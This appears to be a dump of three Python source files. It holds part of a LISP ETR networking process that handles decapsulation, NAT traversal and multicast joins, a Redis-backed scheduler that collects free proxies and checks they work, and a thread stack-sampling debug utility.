if (lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)):
lisp.dprint("Discard echoed multicast packet (through NAT)")
return
#endif
#endif
#
# If this is a trace packet, lisp_trace_append() will swap addresses
# and send packet back to source. We have no app to forward this decap'ed
# packet to, so return.
#
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet, ed="decap") == False): return
#endif
#
# We are going to forward or bridge the decapsulated packet.
#
addr_str = "{} -> {}".format(packet.inner_source.print_address(),
packet.inner_dest.print_address())
lisp.dprint("{} packet for EIDs {}: {} ...".format(f_or_b, \
lisp.green(addr_str, False),
lisp.lisp_format_packet(packet.packet[0:60])))
#
# If we are decapsulating a MAC frame, then use the L2 socket where
# the MAC header is already in packet.
#
if (L2):
packet.bridge_l2_packet(packet.inner_dest, db)
return
#endif
#
# Send on L2 socket since IPv6 raw sockets do not allow us to send an
# entire IPv6 header in payload. Prepend prebuilt MAC header.
#
if (packet.inner_version == 6):
packet.send_l2_packet(lisp_l2_socket, lisp_mac_header)
return
#endif
#
# Default to global raw socket otherwise get socket baesd on instance-ID.
#
raw_socket = packet.get_raw_socket()
if (raw_socket == None): raw_socket = lisp_raw_socket
#
# Send out.
#
packet.send_packet(raw_socket, packet.inner_dest)
return
#enddef
#
# lisp_etr_nat_data_plane
#
# Packet came in on a destination ephemeral port from a source port of 4341.
# That is a RTR encapsulated this packet that is coming through a NAT device.
#
# The packet has the outer IP and UDP headers stripped so the first byte of
# this supplied data packet has the LISP data header on it.
#
def lisp_etr_nat_data_plane(lisp_raw_socket, packet, source):
global lisp_ipc_listen_socket, lisp_send_sockets
#
# Decode LISP header.
#
lisp_header = packet
packet = lisp.lisp_packet(packet[8::])
if (packet.lisp_header.decode(lisp_header) == False): return
#
# Store outer source RLOC address so if we are doing lisp-crypto across
# NAT-traversal, we can find the decryption key.
#
packet.outer_source = lisp.lisp_address(lisp.LISP_AFI_IPV4, source,
lisp.LISP_IPV4_HOST_MASK_LEN, 0)
status = packet.decode(False, lisp_ipc_listen_socket,
lisp.lisp_decap_stats)
if (status == None): return
#
# Special case to log packets with no outer header but are considered
# decapsulated when coming through NATs. Since packets are sent from
# source port 4341, the kernel will strip outer header, so we don't have
# outer header context in lisp_packet().
#
if (lisp.lisp_flow_logging): packet.log_flow(False)
packet.print_packet("Kernel-decap", False)
lisp.dprint(packet.lisp_header.print_header(" "))
#
# If we are looping back Map-Registers via encapsulation, overwrite
# multicast address with source address. That means we are sending a
# Map-Register message to the lisp-core process from our local RLOC
# address to our local RLOC address. Also, zero out the UDP checksum
# since the destination address changes that affects the pseudo-header.
#
if (lisp.lisp_decent_push_configured and
packet.inner_dest.is_multicast_address() and \
packet.lisp_header.get_instance_id() == 0xffffff):
sport = packet.udp_sport
packet = packet.packet[28::]
packet = lisp.lisp_packet_ipc(packet, source, sport)
lisp.lisp_ipc(packet, lisp_ipc_listen_socket, "lisp-ms")
return
#endif
#
# Check if inner packet is a LISP control-packet. Typically RLOC-probes
# from RTRs can come through NATs. We want to reply to the global address
# of the RTR which is the outer source RLOC. We don't care about the
# inner source port since the RTR will decapsulate a data encapsulated
# RLOC-probe Map-Reply.
#
if (packet.lisp_header.get_instance_id() == 0xffffff):
inner_ip = packet.packet
inner_lisp = inner_ip[28::]
ttl = -1
if (lisp.lisp_is_rloc_probe_request(inner_lisp[0:1])):
ttl = struct.unpack("B", inner_ip[8:9])[0] - 1
#endif
lisp.lisp_parse_packet(lisp_send_sockets, inner_lisp, source, 0, ttl)
return
#endif
#
# Packets are arriving on ephemeral socket. Need to check if another data-
# plane is running. If so, don't deliver duplicates.
#
if (lisp.lisp_ipc_data_plane):
lisp.dprint("Drop packet, external data-plane active")
return
#endif
#
# Increment global stats.
#
lisp.lisp_decap_stats["good-packets"].increment(len(packet.packet))
#
# Check if database-mapping exists for our local destination. When the
# destination is a multicast address, check if the source is our EID.
# That means we sent to a group we are members of. If using an RTR,
# it can't tell since the source RLOC could be rewritten by a NAT so
# the ETR must process the packet. If it decaps, the ITR on this system
# will pcap it and encap again. This will happen until the TTL reaches 0.
#
if (packet.inner_dest.is_multicast_address() == False):
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db):
db.increment_decap_stats(packet)
else:
lisp.dprint("No database-mapping found for EID {}".format( \
lisp.green(packet.inner_dest.print_address(), False)))
#endif
#endif
else:
if (lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)):
lisp.dprint("Discard echoed multicast packet")
return
#endif
#endif
#
# If this is a trace packet, lisp_trace_append() will swap addresses
# and send packet back to source. We have no app to forward this decap'ed
# packet to, so return.
#
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet, ed="decap") == False): return
#endif
addr_str = "{} -> {}".format(packet.inner_source.print_address(),
packet.inner_dest.print_address())
lisp.dprint("{} packet for EIDs {}: {} ...".format( \
lisp.bold("NAT-Forward", False), lisp.green(addr_str, False),
lisp.lisp_format_packet(packet.packet[0:60])))
#
# Send on L2 socket since IPv6 raw sockets do not allow us to send an
# entire IPv6 header in payload. Prepend prebuilt MAC header
#
if (packet.inner_version == 6):
packet.send_l2_packet(lisp_l2_socket, lisp_mac_header)
return
#endif
#
# Default to global raw socket otherwise get socket baesd on instance-ID.
#
raw_socket = packet.get_raw_socket()
if (raw_socket == None): raw_socket = lisp_raw_socket
#
# Send out on raw socket.
#
packet.send_packet(raw_socket, packet.inner_dest)
return
#enddef
#
# lisp_register_ipv6_group_entries
#
# Find an IPv6 group-mapping and send a Map-Register for each configured IPv6
# source for the IPv6 group-prefix found.
#
def lisp_register_ipv6_group_entries(group, joinleave):
ms_gm = lisp.lisp_lookup_group(group)
if (ms_gm == None): return
sg = []
for s in ms_gm.sources:
sg.append([s, group, joinleave])
#endfor
lisp_send_multicast_map_register(lisp_send_sockets, sg)
return
#enddef
#
# lisp_etr_join_leave_process
#
# Look at file-system to see if there is a join or leave to be done. This
# function will send joins in the form of building an IP/IGMPv2 packet to
# be passed to lisp_process_igmp_packet(). The groups that are joined are
# ones found as filenames in the current directory as "join-<group>". The
# IGMP Reports wil lbe sent to lisp_process_igmp_packet() every 30 seconds.
#
# For right now, if the group address is IPv6, send a Map-Register directly.
# We will get to MLD support later.
#
# This is used for testing and not meant for production deployment.
#
def lisp_etr_join_leave_process():
global lisp_send_sockets
lisp.lisp_set_exception()
swap = socket.htonl
ipigmp = [swap(0x46000020), swap(0x9fe60000), swap(0x0102d7cc),
swap(0x0acfc15a), swap(0xe00000fb), swap(0x94040000)]
packet = b""
for l in ipigmp: packet += struct.pack("I", l)
#
# Look for files in current directory for "join-<group>" and then send
# an IGMPv2 report to ourselves.
#
while (True):
groups = getoutput("ls join-*").replace("join-", "")
groups = groups.split("\n")
for group in groups:
if (lisp.lisp_valid_address_format("address", group) == False):
continue
#endif
ipv6 = (group.find(":") != -1)
#
# Check if we are leaving group.
#
leavejoin = os.path.exists("leave-{}".format(group))
lisp.lprint("Internal {} group {}".format( \
"leaving" if leavejoin else "joining", group))
#
# Set IGMP message to Report or Leave. Then add group.
#
if (ipv6):
if (group.lower().find("ff02:") != -1):
lisp.lprint("Suppress registration for link-local groups")
continue
#endif
lisp_register_ipv6_group_entries(group, (leavejoin == False))
else:
send_packet = packet
if (leavejoin):
send_packet += struct.pack("I", swap(0x17000000))
else:
send_packet += struct.pack("I", swap(0x16000000))
#endif
octet = group.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
send_packet += struct.pack("I", swap(value))
sg = lisp.lisp_process_igmp_packet(send_packet)
if (type(sg) != bool):
lisp_send_multicast_map_register(lisp_send_sockets, sg)
#endif
time.sleep(.100)
#endif
#endfor
time.sleep(10)
#endwhile
return
#enddef
#
# lisp_etr_process
#
# This thread is for receiving encapsulated LISP packets address to destination
# port 4341. As well as IGMP reports. The IGMP reports can be captured on
# Ubuntu and Fedora but not on MacOS. The former supports IGMPv3 and the
# latter supports IGMPv2 if we listen on "en0".
#
def lisp_etr_process():
lisp.lisp_set_exception()
if (lisp.lisp_myrlocs[0] == None): return
#
# Find all multicast RLEs so we can receive packets on underlay multicast
# groups.
#
rles = lisp.lisp_get_all_multicast_rles()
#
# We need to listen on en0 when doing IGMP testing on MacOS.
#
device = "any"
# device = "en0" if lisp.lisp_is_macos() else "any"
# device = "lo0" if lisp.lisp_is_macos() else "any"
pfilter = "(proto 2) or "
pfilter += "((dst host "
for addr in lisp.lisp_get_all_addresses() + rles:
pfilter += "{} or ".format(addr)
#endif
pfilter = pfilter[0:-4]
pfilter += ") and ((udp dst port 4341 or 8472 or 4789) or "
pfilter += "(udp src port 4341) or "
pfilter += "(udp dst port 4342 and ip[28] == 0x12) or "
pfilter += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + \
"(ip[6]&0xe0 == 0 and ip[7] != 0)))))"
lisp.lprint("Capturing packets for: '{}' on device {}".format(pfilter,
device))
#
# Enter receive loop.
#
if (lisp.lisp_is_python2()):
import pcappy
pcap = pcappy.open_live(device, 1600, 0, 100)
pcap.filter = pfilter
pcap.loop(-1, lisp_etr_data_plane, [device, lisp_raw_socket])
#endif
if (lisp.lisp_is_python3()):
import pcapy
pcap = pcapy.open_live(device, 1600, 0, 100)
pcap.setfilter(pfilter)
while(True):
header, packet = pcap.next()
lisp_etr_data_plane([device, lisp_raw_socket], None, packet)
#endwhile
#endif
return
#enddef
#
# lisp_etr_startup
#
# Intialize this LISP ETR process. This function returns no values.
#
def lisp_etr_startup():
global lisp_ipc_listen_socket
global lisp_ephem_socket
global lisp_send_sockets
global lisp_raw_socket
global lisp_l2_socket
global lisp_mac_header
lisp.lisp_i_am("etr")
lisp.lisp_set_exception()
lisp.lisp_print_banner("ETR starting up")
#
# Get local address for source RLOC for encapsulation.
#
lisp.lisp_get_local_interfaces()
lisp.lisp_get_local_macs()
if (lisp.lisp_get_local_addresses() == False): return(False)
#
# Prebuild MAC header for lisp_l2_socket sending. Disabled code in favor
# of using pytun. See below.
#
# m = list(lisp.lisp_mymacs.keys())[0]
# mac = ""
# for i in range(0, 12, 2): mac += chr(int(m[i:i+2], 16))
# lisp_mac_header = mac + mac + "\x86\xdd"
# lisp.dprint("Built MAC header for L2 socket:",
# lisp.lisp_format_packet(lisp_mac_header))
#
# Used on for listening for Info-Replies for NAT-traversal support.
#
s = lisp.lisp_open_listen_socket("0.0.0.0", str(lisp_ephem_port))
s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 32)
lisp_ephem_socket = s
#
# Open network send socket and internal listen socket.
#
lisp_ipc_listen_socket = lisp.lisp_open_listen_socket("", "lisp-etr")
lisp_send_sockets[0] = lisp_ephem_socket
lisp_send_sockets[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
lisp_send_sockets[2] = lisp_ipc_listen_socket
#
# Open up raw socket so we can send with IP headers after decapsulation.
# There is a special case where the RTR's lisp_send_sockets array is of
# size 4 since we need to pass the raw socket through the lisp.py module
# to send a data encapsulated RLOC-probe to an ETR that sits behind a NAT.
# The test is in lisp_send_map_request() for this. This is the case in
# ETRs as well. All other components use an array size of 3 modulo.
#
lisp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_RAW)
lisp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
lisp_send_sockets.append(lisp_raw_socket)
#
# Open a L2 socket so when we decapsulate and have to route an IPv6
# packet, we have the kernel receive a MAC frame on the loopback interface.
# We do this because there is no IP_HDRINCL for IPv6 raw sockets.
#
# Disabling this code in favor of using a tuntap tun interface via the
# pytun module. See code right below.
#
# if ("PF_PACKET" in dir(socket)):
# interface = "lo" if ("lo" in lisp.lisp_myinterfaces.keys()) else \
# "lo0" if ("lo0" in lisp.lisp_myinterfaces.keys()) else None
# if (interface != None):
# lisp_l2_socket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
# lisp_l2_socket.bind(("lo", 0x86dd))
# #endif
# #endif
#
# Setup tuntap tunnel interface so when we decap IPv6 packets, we can
# send to kernel to route them.
#
if (pytun != None):
lisp_mac_header = b'\x00\x00\x86\xdd'
device = "lispers.net"
try:
lisp_l2_socket = pytun.TunTapDevice(flags=pytun.IFF_TUN,
name=device)
os.system("ip link set dev {} up".format(device))
except:
lisp.lprint("Cannot create tuntap interface")
#endtry
#endif
#
# Start thread to listen on data socket.
#
threading.Thread(target=lisp_etr_process, args=[]).start()
#
# Test code to force IGMPv2 joins and leaves on an airplane. ;-)
#
threading.Thread(target=lisp_etr_join_leave_process, args=[]).start()
return(True)
#enddef
#
# lisp_etr_shutdown
#
# Shut down this process.
#
def lisp_etr_shutdown():
global lisp_register_timer
global lisp_etr_info_timer
#
# Cancel periodic Map-Register and Info timer threads.
#
if (lisp_register_timer): lisp_register_timer.cancel()
if (lisp_etr_info_timer): lisp_etr_info_timer.cancel()
#
# Close sockets.
#
lisp.lisp_close_socket(lisp_send_sockets[0], "")
lisp.lisp_close_socket(lisp_send_sockets[1], "")
lisp.lisp_close_socket(lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_etr_discover_eid
#
# Process IPC message from the lisp-itr process. It will be in the form of:
#
# "learn%<eid-string>%<interface-name>"
#
def lisp_etr_discover_eid(ipc):
ipc = ipc.split("%")
eid_str = ipc[1]
interface = ipc[2]
if (interface == "None"): interface = None
eid = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
eid.store_address(eid_str)
#
# Do database-mapping lookup.
#
db = lisp.lisp_db_for_lookups.lookup_cache(eid, False)
if (db == None or db.dynamic_eid_configured() == False):
lisp.lprint("ITR/ETR dynamic-EID configuration out of sync for {}". \
format(lisp.green(eid_str, False)))
return
#endif
#
# Do logic checks. That is do not remove an entry if it is not there and
# don't try to add an entry if it is already cached.
#
dyn_eid = None
if (eid_str in db.dynamic_eids): dyn_eid = db.dynamic_eids[eid_str]
if (dyn_eid == None and interface == None):
lisp.lprint("ITR/ETR state mismatch for {}".format( \
lisp.green(eid_str, False)))
return
#endif
#
# Check if ITR is changing the interface to the same interface, meaning
# it is confused. Otherwise, the IPC is an interface change. Don't register
# in this case.
#
if (dyn_eid and interface):
if (dyn_eid.interface == interface):
lisp.lprint("ITR sent redundant IPC for {}".format( \
lisp.green(eid_str, False)))
else:
lisp.lprint("Dynamic-EID {} interface change, {} -> {}".format( \
lisp.green(eid_str, False), dyn_eid.interface, interface))
dyn_eid.interface = interface
#endif
return
#endif
#
# Add new entry and register it.
#
if (interface):
dyn_eid = lisp.lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = interface
dyn_eid.get_timeout(interface)
db.dynamic_eids[eid_str] = dyn_eid
reg = lisp.bold("Registering", False)
eid_str = lisp.bold(eid_str, False)
lisp.lprint("{} dynamic-EID {} on interface {}, timeout {}".format(reg,
lisp.green(eid_str, False), interface, dyn_eid.timeout))
lisp_build_map_register(lisp_send_sockets, None, eid, None, False)
#
# Add /32 to routing table.
#
if (lisp.lisp_is_macos() == False):
eid_str = eid.print_prefix_no_iid()
cmd = "ip route add {} dev {}".format(eid_str, interface)
os.system(cmd)
#endif
return
#endif
#
# Remove existig entry and deregister it.
#
if (eid_str in db.dynamic_eids):
interface = db.dynamic_eids[eid_str].interface
dereg = lisp.bold("Deregistering", False)
lisp.lprint("{} dynamic-EID {}".format(dereg,
lisp.green(eid_str, False)))
lisp_build_map_register(lisp_send_sockets, 0, eid, None, False)
db.dynamic_eids.pop(eid_str)
#
# Delete /32 from routing table.
#
if (lisp.lisp_is_macos() == False):
eid_str = eid.print_prefix_no_iid()
cmd = "ip route delete {} dev {}".format(eid_str, interface)
os.system(cmd)
#endif
#endif
return
#enddef
#
# lisp_etr_process_rtr_updown
#
# Process IPC message from lisp-itr. It is telling the lisp-etr process if
# RLOC-probing has determined if the RTR has gone up or down. And therefore
# if it should be registered to the mapping system.
#
def lisp_etr_process_rtr_updown(ipc):
if (lisp.lisp_register_all_rtrs): return
opcode, rtr_str, status = ipc.split("%")
if (rtr_str not in lisp.lisp_rtr_list): return
lisp.lprint("Process ITR IPC message, RTR {} has gone {}".format(
lisp.red(rtr_str, False), lisp.bold(status, False)))
rtr = lisp.lisp_rtr_list[rtr_str]
if (status == "down"):
lisp.lisp_rtr_list[rtr_str] = None
return
#endif
rtr = lisp.lisp_address(lisp.LISP_AFI_IPV4, rtr_str, 32, 0)
lisp.lisp_rtr_list[rtr_str] = rtr
return
#enddef
#
# lisp_etr_process_nonce_ipc
#
# Process an nonce IPC message from the ITR. It wants to know when a nonce
# is echoed from a remote ITR.
#
def lisp_etr_process_nonce_ipc(ipc):
x, opcode, rloc_str, nonce = ipc.split("%")
nonce = int(nonce, 16)
echo_nonce = lisp.lisp_get_echo_nonce(None, rloc_str)
if (echo_nonce == None): echo_nonce = lisp.lisp_echo_nonce(rloc_str)
if (opcode == "R"):
echo_nonce.request_nonce_sent = nonce
lisp.lprint("Waiting for echo-nonce 0x{} from {}".format( \
lisp.lisp_hex_string(nonce), lisp.red(echo_nonce.rloc_str, False)))
elif (opcode == "E"):
echo_nonce.echo_nonce_sent = nonce
lisp.lprint("Sent echo-nonce 0x{} to {}".format( \
lisp.lisp_hex_string(nonce), lisp.red(echo_nonce.rloc_str, False)))
#endif
return
#enddef
#
# ETR commands procssed by this process.
#
lisp_etr_commands = {
"lisp xtr-parameters" : [lispconfig.lisp_xtr_command, {
"rloc-probing" : [True, "yes", "no"],
"nonce-echoing" : [True, "yes", "no"],
"data-plane-security" : [True, "yes", "no"],
"data-plane-logging" : [True, "yes", "no"],
"frame-logging" : [True, "yes", "no"],
"flow-logging" : [True, "yes", "no"],
"nat-traversal" : [True, "yes", "no"],
"checkpoint-map-cache" : [True, "yes", "no"],
"ipc-data-plane" : [True, "yes", "no"],
"decentralized-push-xtr" : [True, "yes", "no"],
"decentralized-pull-xtr-modulus" : [True, 1, 0xff],
"decentralized-pull-xtr-dns-suffix" : [True],
"register-reachable-rtrs" : [True, "yes", "no"],
"program-hardware" : [True, "yes", "no"] }],
"lisp interface" : [lispconfig.lisp_interface_command, {
"interface-name" : [True],
"device" : [True],
"instance-id" : [True, 0, 0xffffffff],
"dynamic-eid" : [True],
"dynamic-eid-device" : [True],
"lisp-nat" : [True, "yes", "no"],
"dynamic-eid-timeout" : [True, 0, 0xff] }],
"lisp map-server" : [lisp_etr_map_server_command, {
"ms-name" : [True],
"address" : [True],
"dns-name" : [True],
"authentication-type" : [False, "sha1", "sha2"],
"authentication-key" : [False],
"encryption-key" : [False],
"proxy-reply" : [False, "yes", "no"],
"want-map-notify" : [False, "yes", "no"],
"merge-registrations" : [False, "yes", "no"],
"refresh-registrations" : [False, "yes", "no"],
"site-id" : [False, 1, 0xffffffffffffffff] }],
"lisp database-mapping" : [lisp_etr_database_mapping_command, {
"prefix" : [],
"mr-name" : [True],
"ms-name" : [True],
"instance-id" : [True, 0, 0xffffffff],
"secondary-instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"dynamic-eid" : [True, "yes", "no"],
"signature-eid" : [True, "yes", "no"],
"register-ttl" : [True, 1, 0xffffffff],
"rloc" : [],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"address" : [True],
"interface" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp explicit-locator-path" : [lispconfig.lisp_elp_command, {
"elp-name" : [False],
"elp-node" : [],
"address" : [True],
"probe" : [True, "yes", "no"],
"strict" : [True, "yes", "no"],
"eid" : [True, "yes", "no"] }],
"lisp replication-list-entry" : [lispconfig.lisp_rle_command, {
"rle-name" : [False],
"rle-node" : [],
"address" : [True],
"level" : [True, 0, 255] }],
"lisp geo-coordinates" : [lispconfig.lisp_geo_command, {
"geo-name" : [False],
"geo-tag" : [False] }],
"lisp json" : [lispconfig.lisp_json_command, {
"json-name" : [False],
"json-string" : [False] }],
"lisp group-mapping" : [lisp_group_mapping_command, {
"group-name" : [False],
"ms-name" : [True],
"group-prefix" : [False],
"instance-id" : [True, 0, 0xffffffff],
"rle-address" : [False],
"sources" : [],
"address" : [True] }],
"show database-mapping" : [lisp_etr_show_command, { }],
"show etr-keys" : [lisp_etr_show_keys_command, {}],
"show etr-dynamic-eid" : [lispconfig.lisp_show_dynamic_eid_command, { }]
}
#------------------------------------------------------------------------------
#
# Main entry point for process.
#
if (lisp_etr_startup() == False):
lisp.lprint("lisp_etr_startup() failed")
lisp.lisp_print_banner("ETR abnormal exit")
exit(1)
#endif
socket_list = [lisp_ephem_socket, lisp_ipc_listen_socket]
while (True):
try: ready_list, w, x = select.select(socket_list, [], [])
except: break
#
# Process Info-Reply messages received on ephemeral port.
#
if (lisp_ephem_socket in ready_list):
opcode, source, port, packet = \
lisp.lisp_receive(lisp_ephem_socket, False)
if (source == ""): break
if (port == lisp.LISP_DATA_PORT):
lisp_etr_nat_data_plane(lisp_raw_socket, packet, source)
else:
if (lisp.lisp_is_rloc_probe_request(packet[0:1])):
lisp.lprint("ETR ignoring RLOC-probe request, using pcap")
continue
#endif
send_register = lisp.lisp_parse_packet(lisp_send_sockets, packet,
source, port)
#
# Info-Reply from map-server has new RTR-list, trigger a
# Map-Register and a Info-Request to the RTR.
#
if (send_register):
lisp_etr_info_timer = threading.Timer(0,
lisp_etr_process_info_timer, [None])
lisp_etr_info_timer.start()
lisp_register_timer = threading.Timer(0,
lisp_process_register_timer, [lisp_send_sockets])
lisp_register_timer.start()
#endif
#endif
#endif
#
# Process either commands, an IPC data-packet (for testing), or any
# protocol message on the IPC listen socket.
#
if (lisp_ipc_listen_socket in ready_list):
opcode, source, port, packet = \
lisp.lisp_receive(lisp_ipc_listen_socket, True)
if (source == ""): break
if (opcode == "command"):
if (packet.find("learn%") != -1):
lisp_etr_discover_eid(packet)
elif (packet.find("nonce%") != -1):
lisp_etr_process_nonce_ipc(packet)
elif (packet.find("clear%") != -1):
lispconfig.lisp_clear_decap_stats(packet)
elif (packet.find("rtr%") != -1):
lisp_etr_process_rtr_updown(packet)
elif (packet.find("stats%") != -1):
packet = packet.split("%")[-1]
lisp.lisp_process_data_plane_decap_stats(packet, None)
else:
lispconfig.lisp_process_command(lisp_ipc_listen_socket,
opcode, packet, "lisp-etr", [lisp_etr_commands])
#endif
elif (opcode == "api"):
lisp.lisp_process_api("lisp-etr", lisp_ipc_listen_socket, packet)
else:
if (lisp.lisp_is_rloc_probe_request(packet[0:1])):
lisp.lprint("ETR ignoring RLOC-probe request, using pcap")
continue
#endif
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port)
#endif
#endif
#endwhile
lisp_etr_shutdown()
lisp.lisp_print_banner("ETR normal exit")
exit(0)
#------------------------------------------------------------------------------
|
schedule.py
|
import time
from multiprocessing import Process
import asyncio
import aiohttp
try:
from aiohttp.errors import ProxyConnectionError,ServerDisconnectedError,ClientResponseError,ClientConnectorError
except:
from aiohttp import ClientProxyConnectionError as ProxyConnectionError,ServerDisconnectedError,ClientResponseError,ClientConnectorError
from proxypool.db import RedisClient
from proxypool.error import ResourceDepletionError
from proxypool.getter import FreeProxyGetter
from proxypool.setting import *
from asyncio import TimeoutError
class ValidityTester(object):
test_api = TEST_API
def __init__(self):
self._raw_proxies = None
self._usable_proxies = []
def set_raw_proxies(self, proxies):
self._raw_proxies = proxies
self._conn = RedisClient()
# async实现异步检查
async def test_single_proxy(self, proxy):
"""
text one proxy, if valid, put them to usable_proxies.
"""
try:
# aiohttp异步请求库
async with aiohttp.ClientSession() as session:
try:
# isinstance() 函数来判断一个对象是否是一个已知的类型,类似 type()。
if isinstance(proxy, bytes):
proxy = proxy.decode('utf-8')
real_proxy = 'http://' + proxy
print('Testing', proxy)
async with session.get(self.test_api, proxy=real_proxy, timeout=get_proxy_timeout) as response:
if response.status == 200:
self._conn.put(proxy)
print('Valid proxy', proxy)
except (ProxyConnectionError, TimeoutError, ValueError):
print('Invalid proxy', proxy)
except (ServerDisconnectedError, ClientResponseError,ClientConnectorError) as s:
print(s)
pass
def test(self):
"""
aio test all proxies.
"""
print('ValidityTester is working')
try:
loop = asyncio.get_event_loop()
tasks = [self.test_single_proxy(proxy) for proxy in self._raw_proxies]
loop.run_until_complete(asyncio.wait(tasks))
except ValueError:
print('Async Error')
class PoolAdder(object):
"""
add proxy to pool
"""
def __init__(self, threshold):
self._threshold = threshold
self._conn = RedisClient()
self._tester = ValidityTester()
self._crawler = FreeProxyGetter()
def is_over_threshold(self):
"""
judge if count is overflow.
"""
if self._conn.queue_len >= self._threshold:
return True
else:
return False
def add_to_queue(self):
print('PoolAdder is working')
proxy_count = 0
while not self.is_over_threshold():
for callback_label in range(self._crawler.__CrawlFuncCount__):
callback = self._crawler.__CrawlFunc__[callback_label]
raw_proxies = self._crawler.get_raw_proxies(callback)
# test crawled proxies
self._tester.set_raw_proxies(raw_proxies)
self._tester.test()
proxy_count += len(raw_proxies)
if self.is_over_threshold():
print('IP is enough, waiting to be used')
break
if proxy_count == 0:
raise ResourceDepletionError
class Schedule(object):
@staticmethod # 声明了静态方法 f,从而可以实现实例化使用 C().f(),当然也可以不实例化调用该方法 C.f()。
def valid_proxy(cycle=VALID_CHECK_CYCLE): # VALID_CHECK_CYCLE是在setting中定义好
"""
Get half of proxies which in redis
"""
conn = RedisClient()
tester = ValidityTester()
while True:
print('Refreshing ip')
# 从redis拿出一半的数据进行检测
count = int(0.5 * conn.queue_len)
if count == 0:
print('Waiting for adding')
time.sleep(cycle)
continue
raw_proxies = conn.get(count)
tester.set_raw_proxies(raw_proxies)
tester.test()
time.sleep(cycle)
@staticmethod
def check_pool(lower_threshold=POOL_LOWER_THRESHOLD,
upper_threshold=POOL_UPPER_THRESHOLD,
cycle=POOL_LEN_CHECK_CYCLE):
"""
If the number of proxies less than lower_threshold, add proxy
多了,就停止添加
"""
conn = RedisClient()
adder = PoolAdder(upper_threshold)
while True:
if conn.queue_len < lower_threshold:
adder.add_to_queue()
time.sleep(cycle)
def run(self):
print('Ip processing running')
# 运行了两个进程
# 从redis中取出ip进行验证
valid_process = Process(target=Schedule.valid_proxy)
# 将网上的ip放进redis
check_process = Process(target=Schedule.check_pool)
valid_process.start()
check_process.start()
|
stack_monitor.py
|
import linecache
import logging
import os
import sys
import time
import threading
import typing as T
logger = logging.getLogger(__name__)
class StackMonitor:
"""
Uses code from the hanging_threads library: https://github.com/niccokunzmann/hanging_threads
"""
def __init__(self, name, **kwargs):
"""
:param poll_interval: Interval between stack polls (in seconds) Default: 0.1
:param print_interval: Interval between stack prints (in seconds) Default: 5
:param clear_on_print: Whether to clear the stack counters on each print to prevent memory leaks Default: True
"""
self._monitor_thread: T.Optional[StoppableThread] = None
self._print_thread: T.Optional[StoppableThread] = None
self._poll_interval = float(kwargs.get("poll_interval", 0.1))
self._print_interval = float(kwargs.get("print_interval", 5))
self._clear_on_print = bool(kwargs.get("clear_on_print", True))
self._stack_counter = {}
self._stack_lock = threading.Lock()
self._interval_start = time.time()
self._name = name
def start_monitoring(self):
self._interval_start = time.time()
if not self._monitor_thread:
self._monitor_thread = StoppableThread(target=self._monitor_fn, daemon=True)
self._monitor_thread.start()
if not self._print_thread:
self._print_thread = StoppableThread(target=self._print_stacks, daemon=True)
self._print_thread.start()
def _monitor_fn(self):
while not self._monitor_thread.is_stopped():
time.sleep(self._poll_interval)
with self._stack_lock:
frames = self._get_frames()
for thread_name in frames:
frame_str = frames[thread_name]
if thread_name not in self._stack_counter:
self._stack_counter[thread_name] = {}
if frame_str not in self._stack_counter[thread_name]:
self._stack_counter[thread_name][frame_str] = 1
else:
self._stack_counter[thread_name][frame_str] += 1
def stop_monitoring(self):
# Print the stacks one last time
self.__print()
with self._stack_lock:
if self._monitor_thread:
self._monitor_thread.stop()
if self._print_thread:
self._print_thread.stop()
def _get_frames(self):
threads = {thread.ident: thread for thread in threading.enumerate()}
res = {}
frames = sys._current_frames()
for thread_id, frame in frames.items():
if thread_id in (self._monitor_thread.ident, self._print_thread.ident):
continue
res[threads[thread_id].name] = self.thread2list(frame)
return res
@staticmethod
def thread2list(frame):
frames = []
while frame:
frames.insert(0, StackMonitor.frame2string(frame))
frame = frame.f_back
return "".join(frames)
@staticmethod
def frame2string(frame):
lineno = frame.f_lineno
co = frame.f_code
filename = co.co_filename
name = co.co_name
s = f"File '{filename}', line {lineno}, in {name}:"
line = linecache.getline(filename, lineno, frame.f_globals).lstrip()
return s + f"\r\n\t{line}"
def _print_stacks(self):
while True:
time.sleep(self._print_interval)
if self._print_thread.is_stopped():
break
self.__print()
def __print(self):
with self._stack_lock:
if len(self._stack_counter):
dt = time.time() - self._interval_start
res = f"Stack samples for process {os.getpid()}, name {self._name} for the last {dt:.0f} s.:"
for thread_id, frames_cnt in self._stack_counter.items():
res += "\r\n========================================================\r\n"
res += f"||THREAD '{thread_id}':||\r\n{self.frame_cnt_to_str(frames_cnt)}"
# logger.info(res)
print(res)
if self._clear_on_print:
self._interval_start = time.time()
self._stack_counter.clear()
@staticmethod
def frame_cnt_to_str(frames_cnt):
s = ""
for frame in sorted(frames_cnt, key=frames_cnt.get, reverse=True):
s += f">>>COUNT: {frames_cnt[frame]}:\r\n{frame}"
return s
class StoppableThread(threading.Thread):
def __init__(self, *args, **kwargs):
super(StoppableThread, self).__init__(*args, **kwargs)
self._stopped = False
def stop(self):
self._stopped = True
def is_stopped(self):
return self._stopped
# For debugging of StackMonitor
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
def fn_1():
print("Hi1")
time.sleep(1)
def fn_2():
print("Hi2")
time.sleep(0.5)
def loop():
while True:
fn_1()
fn_2()
sm = StackMonitor("")
